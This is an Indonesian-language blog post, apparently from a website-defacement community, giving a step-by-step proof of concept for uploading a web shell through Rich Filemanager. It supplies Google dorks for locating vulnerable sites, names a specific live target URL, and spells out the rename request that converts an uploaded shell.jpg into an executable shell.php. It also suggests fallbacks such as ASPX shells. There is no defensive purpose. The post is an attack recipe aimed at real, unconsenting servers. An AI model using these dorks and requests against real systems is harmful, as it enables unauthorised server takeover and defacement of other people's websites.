Deface Poc Vulnerability Rich Filemanager Shell Upload (Live Target)

Vulnerability Filemanager Shell Upload

 Dork: pre>/filemanager/userfiles
           inurl:assets/filemanager intitle:filemanager
           etc.
 Live Target: http://bxbin.com/BxFlipTV/assets/filemanager
Step To Step
 1.Dork, pilih salah satu target
 2.Rename, jadi lu upload shell dulu formatnya jpg abis itu kasih exploit kek gini
"/filemanager/connectors/php/filemanager.php?mode=rename&old=/BxFlipTV/assets/filemanager/userfiles/shell.jpg&new=shell.php".

Nah pas bagian old dibawah ini lu ganti path sitenya, tapi kadang ada yang langsung gini
 old=/userfiles/shell.jpg.

Akses Shell? /filemanager/userfiles/shell.php
Gak bisa up shell? Atau shell pas diakses gagal, coba make shell aspx kali aja servernya gk install php.

Tapi kalo emang gk bisa semua, coba tamper file txt u atau script kek ke dir home, hapus pada path upload

Berlangganan update artikel terbaru via email:

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel